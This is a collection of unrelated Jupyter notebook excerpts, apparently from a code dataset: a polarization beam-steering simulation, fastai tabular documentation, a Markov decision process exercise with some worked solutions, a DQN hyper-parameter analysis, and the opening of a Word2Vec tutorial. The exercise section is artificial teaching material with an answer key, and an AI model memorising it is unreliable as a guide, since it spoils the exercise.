# every chain on the same ray; each unordered ray pair then contributes four
# mixed rows (two co-polar, two cross-polar).
total_combi = Nc*Nray
cluster = np.arange(total_combi)
print(cluster)
c = list(itertools.combinations(cluster, 2))
num_path = (2*total_combi-1)*total_combi
path_combi = np.zeros((num_path,4),dtype=int)
print(path_combi.shape)
# Same-ray rows: [p, p, p, p] for each ray p.
for p in range(total_combi):
    path_combi[p, :] = p
count = 0
for first, second in c:
    base = total_combi + 4 * count
    path_combi[base, :] = [first, first, second, second]
    path_combi[base + 1, :] = [second, second, first, first]
    path_combi[base + 2, :] = [first, second, second, first]
    path_combi[base + 3, :] = [second, first, first, second]
    count = count + 1
# print(path_combi[0:10,:])
# Effective gain of every candidate pairing in every realization.
# Each of the four terms below contributes only when its tx/rx ray indices
# match (the boolean equality factors act as 0/1 masks); the rotation angles
# project the h/v path gains onto the receive polarizations.
path_gain = np.zeros((num_path,realization)) # shape: (combinations, realizations)
for reali in range(realization):
    for combi in range(num_path):
        path_gain[combi,reali] =\
        (np.abs\
        ((np.cos(ele_rot[reali])*np.cos(azi_rot[reali])*alpha_hh[path_combi[combi,0],reali]+np.sin(ele_rot[reali])*alpha_vh[path_combi[combi,0],reali])*(path_combi[combi,0]==path_combi[combi,1])+\
        (np.cos(ele_rot[reali])*np.cos(azi_rot[reali])*alpha_hv[path_combi[combi,2],reali]+np.sin(ele_rot[reali])*alpha_vv[path_combi[combi,2],reali])*(path_combi[combi,2]==path_combi[combi,1])+\
        (-np.sin(ele_rot[reali])*np.cos(azi_rot[reali])*alpha_hh[path_combi[combi,0],reali]+np.cos(ele_rot[reali])*alpha_vh[path_combi[combi,0],reali])*(path_combi[combi,0]==path_combi[combi,3])+\
        (-np.sin(ele_rot[reali])*np.cos(azi_rot[reali])*alpha_hv[path_combi[combi,2],reali]+np.cos(ele_rot[reali])*alpha_vv[path_combi[combi,2],reali])*(path_combi[combi,2]==path_combi[combi,3])
        ))**2
print(num_path)
print(path_gain.shape)
print(alpha_hh.shape)
```
__Check maximum gain from combination of path in each realization__
To do the joint polar beam steering later
```
# Index of the combination with the largest effective gain in each realization.
# Vectorized argmax over the combination axis replaces the per-realization loop.
index = np.argmax(path_gain, axis=0).astype(int)
```
__Create the Cross and Co Polar Index__
```
# Partition combination indices into the three pairing families. In the
# construction above each ray pair contributes 4 consecutive rows:
# the first two are co-polar, the last two are cross-polar.
cross_index = []
samepolar_index = []
count = total_combi-1
while (count<num_path-4):
    cross_index.extend([count+3,count+4])
    samepolar_index.extend([count+1,count+2])
    count = count + 4
cross_index = np.array(cross_index)
samepolar_index = np.array(samepolar_index)
sameclus_index = np.arange(0,total_combi)
print(cross_index)
print(samepolar_index)
print(sameclus_index)
# Which family did the per-realization winner fall into?
cross_index_in = np.isin(index, cross_index)
samepolar_index_in = np.isin(index, samepolar_index)
sum_cross = sum(cross_index_in)
sum_co = sum(samepolar_index_in)
# Fixed: use `realization` instead of the hard-coded 1000 so the count stays
# correct if the number of realizations is changed above.
sum_sameclus = realization - sum(samepolar_index_in) - sum(cross_index_in)
print('Number of Cross Index chosen in 1000 realization: ',sum_cross)
print('Number of Same Polar Index chosen in 1000 realization: ',sum_co)
print('Number of Same Cluster Index chosen in 1000 realization: ',sum_sameclus)
# Total combinations per family (used for the pie chart below).
nu_path_sameclus = total_combi
nu_path_copolar = total_combi*(total_combi-1)
nu_path_crpolar = total_combi*(total_combi-1)
print(nu_path_sameclus)
print(nu_path_copolar)
print(nu_path_crpolar)
print(num_path)
```
__Plot Distribution of Index Chosen__
```
# Histogram of which beam combination achieved the maximum gain, colour-coded
# by family: red = same ray, blue = cross-polar, green = co-polar.
fig = plt.figure(figsize=(10,4), dpi=200)
n, bins, patches = plt.hist(index, bins=range(0,num_path+1),facecolor='green', alpha=0.75)
# Re-colour the bars belonging to the same-ray and cross-polar families.
for i in range(0,total_combi):
    patches[i].set_fc('r')
for j in cross_index:
    patches[j].set_fc('b')
cluster_same = mpatches.Patch(color='red', label='Same Cluster')
cross_polar = mpatches.Patch(color='blue', label='Cross polar steering')
diff_clus_same_polar = mpatches.Patch(color='green', label='Diff Cluster - Same Polar')
plt.legend(handles=[cluster_same,cross_polar,diff_clus_same_polar])
# Fixed typo in the title string ('diffent' -> 'different').
plt.title('Histogram of chosen path from different kind of combination')
plt.show()
# Frequency table of the winning combination indices.
unique, counts = np.unique(index, return_counts=True)
print(dict(zip(unique, counts)))
```
__PieChart__
```
# Two pie charts: share of each family among all combinations (left) vs.
# share of each family among the per-realization winners (right).
fig = plt.figure(figsize=(10,4), dpi=80)
the_grid = GridSpec(1, 2)
colors = ['yellowgreen', 'gold', 'lightskyblue', 'lightcoral']
labels = 'SameRay', 'DiffClus Co-Polar', 'DiffClus Cr-Polar'
chosen_max = [sum_sameclus, sum_co, sum_cross]  # how often each family won
num_in_totalpath = [nu_path_sameclus,nu_path_copolar,nu_path_crpolar]  # family sizes
explode = (0, 0, 0)
plt.subplot(the_grid[0, 0], aspect=1)
plt.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.
patches, texts,autotexts = plt.pie(num_in_totalpath, explode=explode,colors=colors, autopct='%1.1f%%',shadow=True, startangle=90)
for t in texts:
    t.set_size('x-large')
for t in autotexts:
    t.set_size('x-large')
plt.title("Path Combinations",fontsize = 20)
plt.subplot(the_grid[0, 1], aspect=1)
plt.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.
patches, texts,autotexts = plt.pie(chosen_max, explode=explode,colors=colors, autopct='%1.1f%%',shadow=True, startangle=90)
for t in texts:
    t.set_size('x-large')
for t in autotexts:
    t.set_size('x-large')
plt.legend(patches,labels,bbox_to_anchor=[0.22, 0.3], loc="best",prop={'size': 15})
plt.title("Effective Channel Gain Maximum",fontsize=20)
plt.show()
```
### Distribution of each kind of combination by simulation
__Index of Same Cluster Max__
```
# Best same-ray combination (search restricted to the first total_combi rows)
# and its gain, per realization -- vectorized instead of two explicit loops.
index_sameclus = np.argmax(path_gain[0:total_combi, :], axis=0).astype(int)
gain_sameclus = path_gain[index_sameclus, np.arange(realization)]
```
__Index of Different Cluster-Cross Polar Max__
```
cross_index
# Best cross-polar pairing per realization. The gain lookup reuses the argmax
# already computed (the original recomputed the argmax inside the gain loop),
# and both steps are vectorized over realizations.
index_diffclus_crosspol = np.argmax(path_gain[cross_index, :], axis=0).astype(int)
gain_diffclus_crosspol = path_gain[cross_index[index_diffclus_crosspol], np.arange(realization)]
```
__Index of Different Cluster-Same Polar Max__
```
samepolar_index
# Best co-polar pairing per realization; same fix as the cross-polar cell:
# reuse the computed argmax instead of recomputing it, vectorized.
index_diffclus_samepol = np.argmax(path_gain[samepolar_index, :], axis=0).astype(int)
gain_diffclus_samepol = path_gain[samepolar_index[index_diffclus_samepol], np.arange(realization)]
```
### Plot the Distribution
```
# Gain distributions of the per-realization best combination within each family.
fig = plt.figure(figsize=(20,16), dpi=30)
plt.subplot(3, 1, 1)
plt.title('Same ray ', fontsize = 42)
sns.distplot(gain_sameclus,bins=150, kde = False)
plt.xlim(0,60)
plt.tick_params(axis='both', which='major', labelsize=42)
print('Average of Same Cluster Gain Distribution:',np.mean(gain_sameclus))
# NOTE(review): this vertical line is labelled "Mean Value" but is drawn at
# mean-1 (same offset in the two subplots below) -- confirm the -1 is intentional.
plt.axvline(np.mean(gain_sameclus)-1, color='r', linestyle='solid',label="Mean Value")
plt.legend(fontsize=42)
plt.subplot(3, 1, 2)
plt.title('Different ray - Cross polarization', fontsize = 42)
sns.distplot(gain_diffclus_crosspol,bins=100, kde = False)
plt.xlim(0,60)
plt.tick_params(axis='both', which='major', labelsize=42)
plt.axvline(np.mean(gain_diffclus_crosspol)-1, color='r', linestyle='solid',label="Mean Value")
plt.legend(fontsize=42)
print('Average of Different Cluster - Cross polar Distribution:',np.mean(gain_diffclus_crosspol))
plt.subplot(3, 1, 3)
plt.title('Different ray - Same polarization', fontsize = 42)
sns.distplot(gain_diffclus_samepol,bins=100, kde = False)
plt.xlim(0,60)
plt.tick_params(axis='both', which='major', labelsize=42)
plt.axvline(np.mean(gain_diffclus_samepol)-1, color='r', linestyle='solid',label="Mean Value")
plt.legend(fontsize=42)
plt.tight_layout()
print('Average of Different Cluster - Same polar Gain Distribution:',np.mean(gain_diffclus_samepol))
# fig = plt.figure(figsize=(20,20), dpi=50)
# plt.subplot(2, 1, 1)
# plt.title('Same Cluster - Different Cluster Cross polar', fontsize = 28)
# sns.distplot(gain_sameclus-gain_diffclus_crosspol,bins=180, kde = False)
# plt.xlim(-50,100)
# plt.tick_params(axis='both', which='major', labelsize=20)
# print('Average of Same Cluster Gain Distribution:',np.mean(gain_sameclus))
# plt.subplot(2, 1, 2)
# plt.title('Different Cluster - Cross polar Gain Distribution', fontsize = 28)
# sns.distplot(gain_sameclus-gain_diffclus_samepol,bins=100, kde = False)
# plt.xlim(-50,100)
# plt.tick_params(axis='both', which='major', labelsize=20)
# print('Average of Different Cluster - Cross polar Gain Distribution:',np.mean(gain_sameclus-gain_diffclus_crosspol))
# print(np.count_nonzero(gain_sameclus>gain_diffclus_crosspol)/1000)
# print(np.count_nonzero(gain_sameclus>gain_diffclus_samepol)/1000)
# print(np.count_nonzero(gain_sameclus>np.maximum(gain_diffclus_samepol,gain_diffclus_crosspol))/1000)
```
### Independent Beam Steering Horizontal | Vertical
```
# Independent per-polarization steering: for each realization pick the strongest
# H->H path for the horizontal chain (row 0) and the strongest V->V path for
# the vertical chain (row 1). Vectorized argmax over the path axis.
steer_path = np.vstack((
    np.argmax(np.abs(alpha_hh)**2, axis=0),
    np.argmax(np.abs(alpha_vv)**2, axis=0),
)).astype(int)
```
### Plot Spectral Efficiency
```
# Spectral efficiency vs. SNR for the three steering strategies, averaged
# over realizations.
SNR_dB = np.arange(-35,10,5)
SNR = 10**(SNR_dB/10) # linear SNR
smax = SNR.shape[0]
R_cross = np.zeros([smax, realization],dtype=complex) # joint-polarization steering
R_steer = np.zeros([smax, realization],dtype=complex) # independent-polarization steering
R_samecl = np.zeros([smax, realization],dtype=complex) # same-ray steering
for reali in range(realization):
    _chosen_combi_path = path_combi[index[reali]]
    _chosen_steer_path = steer_path[:,reali]
    _chosen_sameclus_path = path_combi[index_sameclus[reali]]
    # Combiners (W) stack the receive responses of the chosen h/v rx rays;
    # precoders (F) stack the transmit responses of the chosen h/v tx rays.
    W_cross = np.vstack((Ar[:,[_chosen_combi_path[1]],reali],Ar[:,[_chosen_combi_path[3]],reali]))
    F_cross = np.vstack((At[:,[_chosen_combi_path[0]],reali],At[:,[_chosen_combi_path[2]],reali]))
    W_steer = np.vstack((Ar[:,[_chosen_steer_path[0]],reali],Ar[:,[_chosen_steer_path[1]],reali]))
    F_steer = np.vstack((At[:,[_chosen_steer_path[0]],reali],At[:,[_chosen_steer_path[1]],reali]))
    W_samecl = np.vstack((Ar[:,[_chosen_sameclus_path[1]],reali],Ar[:,[_chosen_sameclus_path[3]],reali]))
    F_samecl = np.vstack((At[:,[_chosen_sameclus_path[0]],reali],At[:,[_chosen_sameclus_path[2]],reali]))
    for s in range(smax):
        # log-det rate of the effective channel pinv(W) @ H @ F at each SNR.
        R_cross[s,reali] = np.log2(np.linalg.det(np.eye(Ns)+(SNR[s]/Ns)*np.linalg.pinv(W_cross)@H[:,:,reali]@F_cross@F_cross.conj().T@H[:,:,reali].conj().T@W_cross))
        R_steer[s,reali] = np.log2(np.linalg.det(np.eye(Ns)+(SNR[s]/Ns)*np.linalg.pinv(W_steer)@H[:,:,reali]@F_steer@F_steer.conj().T@H[:,:,reali].conj().T@W_steer))
        R_samecl[s,reali] = np.log2(np.linalg.det(np.eye(Ns)+(SNR[s]/Ns)*np.linalg.pinv(W_samecl)@H[:,:,reali]@F_samecl@F_samecl.conj().T@H[:,:,reali].conj().T@W_samecl))
# Sanity check of the precoder power (last realization only).
x = np.linalg.norm(F_cross,'fro')
print("Ns", Ns , " Frobenius norm FRF*FBB=", x**2)
# Average the per-realization rates and plot.
plt.plot(SNR_dB, (np.sum(R_cross,axis=1).real)/realization, label='joint polarization beam steering')
plt.plot(SNR_dB, (np.sum(R_steer,axis=1).real)/realization, label='independent polarization beam steering')
plt.plot(SNR_dB, (np.sum(R_samecl,axis=1).real)/realization, label='same ray beam steering')
plt.legend(loc='upper left',prop={'size': 10})
plt.xlabel('SNR(dB)',fontsize=12)
plt.ylabel('Spectral Efficiency (bits/s/Hz)',fontsize=12)
plt.tick_params(axis='both', which='major', labelsize=10)
plt.ylim(0,12)
plt.grid()
plt.show()
```
| github_jupyter |
# Tabular data
```
from fastai.gen_doc.nbdoc import *
from fastai.tabular.models import *
```
[`tabular`](/tabular.html#tabular) contains all the necessary classes to deal with tabular data, across two modules:
- [`tabular.transform`](/tabular.transform.html#tabular.transform): defines the [`TabularTransform`](/tabular.transform.html#TabularTransform) class to help with preprocessing;
- [`tabular.data`](/tabular.data.html#tabular.data): defines the [`TabularDataset`](/tabular.data.html#TabularDataset) that handles that data, as well as the methods to quickly get a [`TabularDataBunch`](/tabular.data.html#TabularDataBunch).
To create a model, you'll need to use [`models.tabular`](/tabular.html#tabular). See below for an end-to-end example using all these modules.
## Preprocessing tabular data
First, let's import everything we need for the tabular application.
```
from fastai import *
from fastai.tabular import *
```
Tabular data usually comes in the form of a delimited file (such as .csv) containing variables of different kinds: text/category, numbers, and perhaps some missing values. The example we'll work with in this section is a sample of the [adult dataset](https://archive.ics.uci.edu/ml/datasets/adult) which has some census information on individuals. We'll use it to train a model to predict whether salary is greater than \$50k or not.
```
# Download (cached after first run) and extract the adult-census sample, then peek at it.
path = untar_data(URLs.ADULT_SAMPLE)
path
df = pd.read_csv(path/'adult.csv')
df.head()
```
Here all the information that will form our input is in the 14 first columns, and the dependent variable is the last column. We will split our input between two types of variables: categorical and continuous.
- Categorical variables will be replaced by a category - a unique id that identifies them - before they are passed through an embedding layer.
- Continuous variables will be normalized and then directly fed to the model.
Another thing we need to handle are the missing values: our model isn't going to like receiving NaNs so we should remove them in a smart way. All of this preprocessing is done by [`TabularTransform`](/tabular.transform.html#TabularTransform) objects and [`TabularDataset`](/tabular.data.html#TabularDataset).
We can define a bunch of Transforms that will be applied to our variables. Here we transform all categorical variables into categories. We also replace missing values for continuous variables by the median column value and normalize those.
```
# Preprocessing steps applied in order: fill missing values, encode
# categoricals as category ids, normalize continuous columns.
procs = [FillMissing, Categorify, Normalize]
```
To split our data into training and validation sets, we use valid indexes
```
# Hold out the last 2000 rows as the validation set.
valid_idx = range(len(df)-2000, len(df))
```
Then let's manually split our variables into categorical and continuous variables (we can ignore the dependent variable at this stage). fastai will assume all variables that aren't dependent or categorical are continuous, unless we explicitly pass a list to the `cont_names` parameter when constructing our [`DataBunch`](/basic_data.html#DataBunch).
```
# Target column and the columns treated as categorical; remaining columns
# are treated as continuous (see cont_names below).
dep_var = '>=50k'
cat_names = ['workclass', 'education', 'marital-status', 'occupation', 'relationship', 'race', 'sex', 'native-country']
```
Now we're ready to pass this information to [`TabularDataBunch.from_df`](/tabular.data.html#TabularDataBunch.from_df) to create the [`DataBunch`](/basic_data.html#DataBunch) that we'll use for training.
```
# Build the DataBunch; continuous columns are inferred from what is left over.
data = TabularDataBunch.from_df(path, df, dep_var, valid_idx=valid_idx, procs=procs, cat_names=cat_names)
print(data.train_ds.cont_names) # `cont_names` defaults to: set(df)-set(cat_names)-{dep_var}
```
We can grab a mini-batch of data and take a look (note that [`to_np`](/torch_core.html#to_np) here converts from pytorch tensor to numpy):
```
# Grab one mini-batch: inputs are (categorical codes, continuous values), plus targets.
(cat_x,cont_x),y = next(iter(data.train_dl))
for o in (cat_x, cont_x, y): print(to_np(o[:5]))
```
After being processed in [`TabularDataset`](/tabular.data.html#TabularDataset), the categorical variables are replaced by ids and the continuous variables are normalized. The codes corresponding to categorical variables are all put together, as are all the continuous variables.
## Defining a model
Once we have our data ready in a [`DataBunch`](/basic_data.html#DataBunch), we just need to create a model to then define a [`Learner`](/basic_train.html#Learner) and start training. The fastai library has a flexible and powerful [`TabularModel`](/tabular.models.html#TabularModel) in [`models.tabular`](/tabular.html#tabular). To use that function, we just need to specify the embedding sizes for each of our categorical variables.
```
# Build the tabular model (two hidden layers, custom embedding size for
# native-country) and train for one cycle.
learn = get_tabular_learner(data, layers=[200,100], emb_szs={'native-country': 10}, metrics=accuracy)
learn.fit_one_cycle(1, 1e-2)
```
As usual, we can use the [`Learner.predict`](/basic_train.html#Learner.predict) method to get predictions. In this case, we need to pass the row of a dataframe that has the same names of categorical and continuous variables as our training or validation dataframe.
```
# Predict on a single raw row (must have the same columns as the training frame).
learn.predict(df.iloc[0])
```
| github_jupyter |
# Exercise 2: Markov Chains and Markov Decision Processes (MDP)
This exercise deals with the formal handling of Markov chains and Markov decision processes.
## 1) Markov Chain: State Transition
The graph shows the last beer problem.
The nodes show the states.
The arrows define the possible transitions to other states, and the numbers beside the arrows give the probability of the corresponding transition.
For example, if you are in the state "Inital Beer", with 30% probability you go to have a pizza, with 60% probability you meet friends, and with 10% probability you end up sleeping.
Define the state transition probability matrix $\mathcal{P}_{xx'}$ of the graph shown in the figure below!

With $p_k = \begin{bmatrix}
\text{Pr}_k \lbrace \text{Inital Beer} \rbrace \\
\text{Pr}_k \lbrace \text{Meet Friends} \rbrace \\
\text{Pr}_k \lbrace \text{Pizza} \rbrace \\
\text{Pr}_k \lbrace \text{Another Beer} \rbrace \\
\text{Pr}_k \lbrace \text{"Last Beer"}\rbrace \\
\text{Pr}_k \lbrace \text{Sleep} \rbrace \\
\end{bmatrix}^\text{T}$
YOUR ANSWER HERE
## 2 ) Markov Chain: Stationary State
Using $p = p \mathcal{P}$, calculate the stationary state probability.
Please note that the sum of the state probabilities equals one at any specific point in time.
YOUR ANSWER HERE
## 3) Markov Reward Process: Evaluating States
In the following rewards for every state are defined.
Given the reward distribution $r_\mathcal{X}$, calculate the state-values $v_\mathcal{X}$.
The states are defined by:
$\mathcal{X} = \left\lbrace \begin{matrix}
\text{Inital Beer}\\
\text{Meet Friends}\\
\text{Pizza}\\
\text{Another Beer}\\
\text{"Last Beer"}\\
\text{Sleep}\\
\end{matrix}
\right\rbrace$
The rewards are defined by:
$r_\mathcal{X} = \begin{bmatrix}
+1\\
+1\\
+2\\
+1\\
-3\\
0\\
\end{bmatrix}$
The state-value is defined by the state-value Bellman equation: $v_\mathcal{X} = r_\mathcal{X} + \gamma \mathcal{P}_{xx'} v_\mathcal{X}$. Assume that $\gamma = 0.9$ and write a Python program to calculate $v_\mathcal{X}$. Which state is most promising? Why?
Which state is most promising when $\gamma = 0.1$?
YOUR ANSWER HERE
```
import numpy as np
# define given parameters
gamma = 0.1 # discount factor
# Exercise stub: compute the state-value vector v_X via the Bellman equation
# given in the task text above.
# YOUR CODE HERE
raise NotImplementedError()
print(v_X)
```
## 4) Markov Decision Process: State Transition
The graph shows an MDP.
The nodes are the states.
In every state you can choose between two actions (Lazy or Productive).
Taken actions impact the state transition probability to the next state.
If you for example have a "Hangover" and decide to be "Productive", there is a 30% chance for you to "Visit Lecture" and a 70% chance to stay in the "Hangover" state.
Define the lazy state transition probability $\mathcal{P}_{xx'}^{u=\text{Lazy}}$ and the productive state transition probability $\mathcal{P}_{xx'}^{u=\text{Productive}}$ of the graph shown in the figure below.

With $p_k = \begin{bmatrix}
\text{Pr}_k \lbrace \text{Hangover} \rbrace \\
\text{Pr}_k \lbrace \text{Sleep} \rbrace \\
\text{Pr}_k \lbrace \text{More Sleep} \rbrace \\
\text{Pr}_k \lbrace \text{Visit Lecture} \rbrace \\
\text{Pr}_k \lbrace \text{Study}\rbrace \\
\text{Pr}_k \lbrace \text{Pass the Exam} \rbrace \\
\end{bmatrix}^\text{T}$
## 4) Solution
\begin{align}
\mathcal{P}_{xx'}^{u=\text{Lazy}}&=\begin{bmatrix}
0 & 1 & 0 & 0 & 0 & 0\\
0 & 0 & 1 & 0 & 0 & 0\\
0 & 0 & 1 & 0 & 0 & 0\\
0 & 0 & 0 & 0 & 0.8 & 0.2\\
0 & 0 & 1 & 0 & 0 & 0\\
0 & 0 & 0 & 0 & 0 & 1\\
\end{bmatrix}\\
\mathcal{P}_{xx'}^{u=\text{Productive}}&=\begin{bmatrix}
0.7 & 0 & 0 & 0.3 & 0 & 0\\
0 & 0 & 0.4 & 0.6 & 0 & 0\\
0 & 0 & 0.5 & 0 & 0.5 & 0\\
0 & 0 & 0 & 0 & 1 & 0\\
0 & 0 & 0 & 0 & 0.1 & 0.9\\
0 & 0 & 0 & 0 & 0 & 1\\
\end{bmatrix}
\end{align}
## 5) Markov Decision Process: Trivial Policy Evaluation
The rewards for this problem are defined by:
$r_\mathcal{X} = r_\mathcal{X}^{u=\text{Productive}} = r_\mathcal{X}^{u=\text{Lazy}} = \begin{bmatrix}
-1\\
-1\\
-1\\
-1\\
-1\\
0\\
\end{bmatrix}$.
How can we interprete these rewards?
Evaluate both the lazy policy and the productive policy using $\gamma = 0.9$.
Bonus question: Can we evaluate the state-value of $\lbrace x=\text{More Sleep}, u=\text{Lazy}\rbrace$ for an infinite time horizon without the use of the Bellman equation?
YOUR ANSWER HERE
```
import numpy as np
# Exercise stub: evaluate the lazy and the productive policy here.
# YOUR CODE HERE
raise NotImplementedError()
# Bonus question: Can we evaluate the state-value of {𝑥=More Sleep,𝑢=Lazy} for an infinite time horizon without the use of the Bellman equation?
# YOUR CODE HERE
raise NotImplementedError()
```
## 6) Action-Value Function Evaluation
Now, the policy is defined by:
\begin{align}
\pi(u_k=\text{Productive} | x_k)&=\alpha,\\
\pi(u_k=\text{Lazy} | x_k)&=1-\alpha, \forall x_k \in \mathcal{X}
\end{align}
Calculate action-values for the problem as described using the 'fifty-fifty' policy ($\alpha = 0.5$) according to the Bellman Expectation Equation: $q_\pi(x_k, u_k) = \mathcal{R}^u_x + \gamma \sum_{x_{k+1} \in \mathcal{X}} p^u_{xx'} v_\pi(x_{k+1})$ $\forall x_k, u_k \in \mathcal{X}, \mathcal{U}$.
## 6) Solution
```
import numpy as np
gamma = 0.9 # discount factor
alpha = 0.5 # probability of choosing the "Productive" action (fifty-fifty policy)
no_states = 6
no_actions = 2
r_X = np.array([-1, -1, -1, -1, -1, 0]).reshape(-1, 1) # reward per state, as a column vector
q_XU = np.zeros([no_states, no_actions]) # action-value table to be filled in
# YOUR CODE HERE
raise NotImplementedError()
```
## 7) Markov Decision Problem: Stochastic Policy Evaluation
Plot the state-value of the states "Lecture" and "Study" for different $\alpha$. What do we see? Why?
## 7) Solution
```
import numpy as np
import matplotlib.pyplot as plt
# NOTE(review): the 'seaborn-talk' style name was removed in matplotlib >= 3.6;
# newer versions use 'seaborn-v0_8-talk' -- confirm the pinned matplotlib version.
plt.style.use('seaborn-talk')
n = 6 # dimension of state space
no_of_samples = 1000 # number of alpha values to sweep over
alphas = np.linspace(0, 1, no_of_samples)
v_n_alpha = np.zeros([n, no_of_samples]) # state-values per state (rows) and alpha (columns)
# YOUR CODE HERE
raise NotImplementedError()
# Plot the state-value of every state as a function of alpha.
plt.figure(figsize=[10, 6])
states = ["Hangover", "Sleep", "More Sleep", "Visit Lecture", "Study", "Pass Exam"]
alphas = alphas.flatten()
for state, vnalp in zip(states, v_n_alpha):
    # Dashed lines for the two states the question asks about.
    ls = '--' if state in ['Visit Lecture', 'Study'] else '-'
    plt.plot(alphas, vnalp, ls=ls, label=r"$x=${}".format(state))
plt.legend()
plt.xlabel(r"$\alpha$")
plt.ylabel(r"$v_\pi(x)$")
plt.xlim([0, 1])
plt.ylim([-10, 0])
```
YOUR ANSWER HERE
| github_jupyter |
# Analysis - exp61
- Tuning both MLP and Conv nets. A fuller, all at once, survey of architectures.
```
import os
import csv
import numpy as np
import torch as th
import pandas as pd
from glob import glob
from pprint import pprint
import matplotlib
import matplotlib.pyplot as plt
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
import seaborn as sns
sns.set(font_scale=1.5)
sns.set_style('ticks')
matplotlib.rcParams.update({'font.size': 16})
matplotlib.rc('axes', titlesize=16)
from notebook_helpers import load_params
from notebook_helpers import load_monitored
from notebook_helpers import join_monitored
from notebook_helpers import score_summary
def load_data(path, model, run_index=None):
    """Load monitor CSVs for runs run_index[0]..run_index[1] (inclusive) of `model`.

    Returns a list with one entry per run: the parsed monitor data from
    load_monitored, or None when the monitor file for that run is missing.
    Note: run_index must be a (first, last) pair; the default None would
    raise (unchanged behavior) -- callers always pass an explicit range.
    """
    runs = range(run_index[0], run_index[1] + 1)
    exps = []
    for r in runs:
        # Fixed: the f-string already interpolates r; the trailing
        # `.format(int(r))` in the original was a no-op on a string with
        # no remaining placeholders, so it has been removed.
        file = os.path.join(path, f"run_{model}_{r}_monitor.csv")
        try:
            mon = load_monitored(file)
        except FileNotFoundError:
            mon = None
        exps.append(mon)
    return exps
def load_hp(name):
    """Read the hyper-parameter grid at `name` into a DataFrame (no index column)."""
    frame = pd.read_csv(name, index_col=False)
    return frame
def find_best(hp, data, window, score="score"):
    """Return the 1-row slice of `hp` for the run that scored best.

    Each run's score is the mean of its `score` series over the half-open
    episode window (window[0], window[1]); runs whose monitor is missing
    (None entries) are skipped via NaN. Raises ValueError (from nanargmax)
    if every run is missing.
    """
    scores = []
    # Fixed: iterate the `data` argument. The original iterated the global
    # `exp_61`, silently ignoring whatever was passed in.
    for mon in data:
        if mon is not None:
            selected = mon[score][window[0]:window[1]]
            scores.append(np.mean(selected))
        else:
            scores.append(np.nan)
    best = np.nanargmax(scores)
    return hp[best:best + 1]
```
# Load data
```
# Load the exp61 hyper-parameter grid and define the models / run range to analyse.
path = "/Users/qualia/Code/azad/data/wythoff/exp61/"
hp_61 = load_hp(os.path.join(path,"grid.csv"))
models = ["DQN_hot1", "DQN_hot2", "DQN_hot3", "DQN_hot4", "DQN_hot5", "DQN_conv1",
          "DQN_conv2", "DQN_conv3"]
index = (0, 500)
# Peek at the first grid row.
hp_61[0:1]
# Fixed: removed the stray `x.obj` expression -- `x` is never defined in this
# notebook, so that line raised a NameError.
```
# Plots
## All parameter summary
How's it look overall.
### Timecourse
```
# One figure per model: overlay the score time-course of every run.
for model in models:
    exp_61 = load_data(path, model, run_index=index)
    plt.figure(figsize=(6, 3))
    for r, mon in enumerate(exp_61):
        if mon is not None:
            _ = plt.plot(mon['episode'], mon['score'], color='black', alpha=0.4)
    _ = plt.ylim(0, 1)
    _ = plt.title(model)
    _ = plt.ylabel("Optimal score")
    _ = plt.xlabel("Episode")
    # NOTE(review): no plotted artist carries a label, so this legend call
    # likely renders nothing -- confirm whether a label was intended above.
    _ = plt.legend(loc="right")
    sns.despine()
```
- Still terrible.
# Find the best HP
```
# For each model, report the hyper-parameter row whose run scored best over
# the final (450, 500) episode window.
for model in models:
    exp_61 = load_data(path, model, run_index=index)
    best_hp = find_best(hp_61, exp_61, (450,500))
    print(f"{model}:\n{best_hp}\n---")
```
| github_jupyter |
# Skip-gram Word2Vec
In this notebook, I'll lead you through using PyTorch to implement the [Word2Vec algorithm](https://en.wikipedia.org/wiki/Word2vec) using the skip-gram architecture. By implementing this, you'll learn about embedding words for use in natural language processing. This will come in handy when dealing with things like machine translation.
## Readings
Here are the resources I used to build this notebook. I suggest reading these either beforehand or while you're working on this material.
* A really good [conceptual overview](http://mccormickml.com/2016/04/19/word2vec-tutorial-the-skip-gram-model/) of Word2Vec from Chris McCormick
* [First Word2Vec paper](https://arxiv.org/pdf/1301.3781.pdf) from Mikolov et al.
* [Neural Information Processing Systems, paper](http://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf) with improvements for Word2Vec also from Mikolov et al.
---
## Word embeddings
When you're dealing with words in text, you end up with tens of thousands of word classes to analyze; one for each word in a vocabulary. Trying to one-hot encode these words is massively inefficient because most values in a one-hot vector will be set to zero. So, the matrix multiplication that happens in between a one-hot input vector and a first, hidden layer will result in mostly zero-valued hidden outputs.
<img src='assets/one_hot_encoding.png' width=50%>
To solve this problem and greatly increase the efficiency of our networks, we use what are called **embeddings**. Embeddings are just a fully connected layer like you've seen before. We call this layer the embedding layer and the weights are embedding weights. We skip the multiplication into the embedding layer by instead directly grabbing the hidden layer values from the weight matrix. We can do this because the multiplication of a one-hot encoded vector with a matrix returns the row of the matrix corresponding the index of the "on" input unit.
<img src='assets/lookup_matrix.png' width=50%>
Instead of doing the matrix multiplication, we use the weight matrix as a lookup table. We encode the words as integers, for example "heart" is encoded as 958, "mind" as 18094. Then to get hidden layer values for "heart", you just take the 958th row of the embedding matrix. This process is called an **embedding lookup** and the number of hidden units is the **embedding dimension**.
<img src='assets/tokenize_lookup.png' width=50%>
There is nothing magical going on here. The embedding lookup table is just a weight matrix. The embedding layer is just a hidden layer. The lookup is just a shortcut for the matrix multiplication. The lookup table is trained just like any weight matrix.
Embeddings aren't only used for words of course. You can use them for any model where you have a massive number of classes. A particular type of model called **Word2Vec** uses the embedding layer to find vector representations of words that contain semantic meaning.
---
## Word2Vec
The Word2Vec algorithm finds much more efficient representations by finding vectors that represent the words. These vectors also contain semantic information about the words.
<img src="assets/context_drink.png" width=40%>
Words that show up in similar **contexts**, such as "coffee", "tea", and "water" will have vectors near each other. Different words will be further away from one another, and relationships can be represented by distance in vector space.
<img src="assets/vector_distance.png" width=40%>
There are two architectures for implementing Word2Vec:
>* CBOW (Continuous Bag-Of-Words) and
* Skip-gram
<img src="assets/word2vec_architectures.png" width=60%>
In this implementation, we'll be using the **skip-gram architecture** because it performs better than CBOW. Here, we pass in a word and try to predict the words surrounding it in the text. In this way, we can train the network to learn representations for words that show up in similar contexts.
---
## Loading Data
Next, we'll ask you to load in data and place it in the `data` directory
